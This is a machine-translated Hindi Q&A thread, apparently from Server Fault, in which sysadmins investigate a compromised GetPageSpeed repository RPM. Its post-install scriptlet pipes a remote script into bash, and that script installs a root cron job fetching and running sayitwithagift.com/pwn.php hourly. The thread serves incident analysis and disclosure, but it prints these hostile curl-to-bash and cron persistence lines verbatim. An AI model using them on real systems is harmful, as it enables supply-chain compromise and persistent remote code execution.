इस RPM को स्थापित करने से फ़ाइल कैसे बनाई जाती है?


16

रनिंग yum install https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-release-7-1.el7.gps.noarch.rpmबनाता है, /etc/cron.d/sysstat2लेकिन RPM फ़ाइल को हटा देता है:

# rpm -ql getpagespeed-extras-release
/etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
/etc/yum.repos.d/getpagespeed-extras.repo
# rpm -qf /etc/cron.d/sysstat2
file /etc/cron.d/sysstat2 is not owned by any package

RPM ने फ़ाइल कैसे बनाई और मैंने यह कैसे देखा कि उसने और क्या किया?


4
तो, क्या ये GetPageSpeed ​​के स्वामित्व वाले लोग हैं और वे इसे नहीं जानते हैं, या वे स्वयं खराब RPM प्रकाशित कर रहे हैं?
आरोन कोपले

1
तीन महीने पहले मैंने अपनी साइट से जो RPM स्थापित किया था, वह अच्छा था। दुर्भावनापूर्ण व्यक्ति को कल पोस्ट किया गया था। मुझे लगता है कि वे स्वामित्व में थे, और उनके रेपो का उपयोग करने वाला कोई भी व्यक्ति स्वामित्व में है। दुर्भावनापूर्ण यम अद्यतन के माध्यम से नीचे आ रहा है। मैंने उन्हें अपने संपर्क फ़ॉर्म के माध्यम से एक ईमेल और एक संदेश भेजा।
पास्कल

और यह उनके द्वारा भी हस्ताक्षरित है?
एरोन कोपले

1
https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-7-6.el7.gps.noarch.rpmमूल फ़ाइल है, यह अभी भी उनके रेपो में एक पुरानी तारीख है, और gpgcheck=1इसमें सेट है।
पास्कल

1
सुझाव दें कि आप ymMV को किस प्रकार की प्रतिक्रिया के लिए कहते हैं, हालांकि यह भी कहें कि वेब एडमिन से संपर्क करें। मैंने वेबसाइट के होस्टिंग प्रदाता के माध्यम से एक गलत मेल सर्वर के बारे में संपर्क करने के लिए एक बार जाना समाप्त कर दिया क्योंकि वेबसाइट ने कभी भी प्रतिक्रिया नहीं दी।
डैरेन

जवाबों:


18
# rpm -qp --scripts getpagespeed-extras-release-7-1.el7.gps.noarch.rpm
warning: getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: Header V4 RSA/SHA1 Signature, key ID 222b0e83: NOKEY
postinstall scriptlet (using /bin/sh):
curl -s -m 3 https://www.getpagespeed.com/SCM/release-post-install.php 2>/dev/null | bash >/dev/null 2>&1

https://www.getpagespeed.com/SCM/release-post-install.php शामिल हैं:

#!/bin/bash
### hacked by rpowned
# bash <(curl -s https://www.some-other.com/load-it.sh) >/dev/null 2>&1
echo '53 * * * * root curl -s https://www.sayitwithagift.com/pwn.php 2>/dev/null | bash >/dev/null 2>&1' >> /etc/cron.d/sysstat2

16

आपको पता चला कि आरपीएम की स्क्रिप्ट इंटरनेट से एक स्क्रिप्ट चलाती है, और वर्तमान में वह स्क्रिप्ट मालवेयर हो सकती है। हालाँकि, मुझे ऐसा पेलोड नहीं मिल रहा है जो कुछ भी करता हो।

आरपीएम पूरी तरह से ट्रैक नहीं कर सकता कि क्या हुआ क्योंकि यह एक मनमाना स्क्रिप्ट चला रहा है।

gpgcheck आपकी मदद नहीं करेगा, getpagespeed-extras-7-6.el7.gps.noarch.rpmऔर getpagespeed-extras-release-7-1.el7.gps.noarch.rpmआपके द्वारा जुड़े दोनों ही मान्य हस्ताक्षर हैं:

$ gpg --keyid-format long /etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
pub  2048R/0CD60276222B0E83 2017-03-03 GetPageSpeed Builder <info@getpagespeed.com>
sub  2048R/059A9010F4F3567D 2017-03-03
$ rpm -K getpagespeed-extras-*
getpagespeed-extras-7-6.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK
getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK

रेपो मालिक से शिकायत करें कि पैकेज इंटरनेट से मनमाना कोड चलाता है। यदि ऐसा करना चाहिए, तो उनकी सॉफ़्टवेयर आपूर्ति श्रृंखला सुरक्षा में सुधार की आवश्यकता है।

यह इंटरनेट एक्सेस के बिना सॉफ़्टवेयर की पहली इंस्टॉल करने के लिए थोड़ा पागल लगता है, या मैन्युअल रूप से "पोस्ट इंस्टॉल" स्क्रिप्ट का निरीक्षण करता है। लेकिन दुर्भाग्य से लगभग आवश्यक प्रतीत होता है अगर पैकेज इस तरह से गलत सलाह देते हैं।


पेलोड एक क्रॉन जॉब है जो हर घंटे ' sayitwithagift.com/pwn.php ' डाउनलोड और चलाता है । वर्तमान में वहाँ कुछ भी नहीं है, लेकिन यह किसी भी समय बदल सकता है। RPM हटाने से पेलोड नहीं हटता है।
पास्कल

उनके मूल RPM के पास एक बाद की स्क्रिप्ट स्क्रिप्ट नहीं थी। केवल कल अपलोड किया गया संस्करण (संभवतः एक हैकर द्वारा) किया जाता है।
पास्कल

1
अस्पष्ट है कि क्या इंटरनेट कोड निष्पादन से अलग एक कानूनी विचार है, या मैलवेयर चालक दल द्वारा जोड़ा गया है। उत्तरार्द्ध और भी बुरा है, क्योंकि इसका मतलब है कि हस्ताक्षर और अपलोड प्रक्रियाओं से समझौता किया गया था।
जॉन महोवाल

1

मेरे पास 5 CLoudLinux / cPanel सर्वर हैं, जिनका उपयोग Engintron के माध्यम से उन पर Nginx करता था, लेकिन वे अब इसके बजाय LiteSpeed ​​वेबसर्वर चलाते हैं। मुझे लगता है कि जब यह अनइंस्टॉल किया गया था, तो एंजिनट्रॉन ने पन्नों के रिपोज को पीछे छोड़ दिया हो सकता है। cPanel हर रात एक अद्यतन जाँच चलाता है, और लगभग आधी रात को मेरे सभी सर्वरों ने मुझे एक ई-मेल रिपोर्टिंग भेजी:

/bin/sh: -c: line 0: syntax error near unexpected token `('
/bin/sh: -c: line 0: `/bin/bash <(curl -s https://www.sayitwithagift.com/pwn.php) >/dev/null 2>&1'

पेलोड साइट की खोज ने मुझे यहां पहुंचाया जहां मैं देखता हूं कि उसी दिन आपके पास भी यही मुद्दा था। तो मेरी जानकारी को अपने में जोड़ने के लिए। /etc/cron.d/sysstat2मेरे सभी सर्वर पर एक ही फाइल मौजूद थी।

मैंने फ़ाइल को हटा दिया, रिपॉजिट को हटा दिया, और समस्या को रिपोर्ट करने के लिए GetPageSpeed ​​पर संपर्क फ़ॉर्म का उपयोग किया। रेपो का मालिक AWOL हो सकता है क्योंकि एक ब्लॉग पोस्ट में कहा गया था कि वह स्वास्थ्य समस्याओं के कारण रेपो को बंद कर रहा था। इसलिए हो सकता है कि हमलावर ने या तो इस तथ्य का फायदा उठाया कि रेपो पर ध्यान नहीं दिया जा रहा है, या शोषण के लिए एक खुला दरवाजा मिल गया है।


1
रेपो को बंद करने के बारे में संदेश पोस्ट किए जाने के बाद उन्होंने ईमेल किया था। मैंने उसे रेपो खोलने के लिए कहा और हटाने के लिए अद्यतन पैकेज पोस्ट करें /etc/cron.d/sysstat2। उसने ऐसा किया है।
पास्कल
हमारी साइट का प्रयोग करके, आप स्वीकार करते हैं कि आपने हमारी Cookie Policy और निजता नीति को पढ़ और समझा लिया है।
Licensed under cc by-sa 3.0 with attribution required.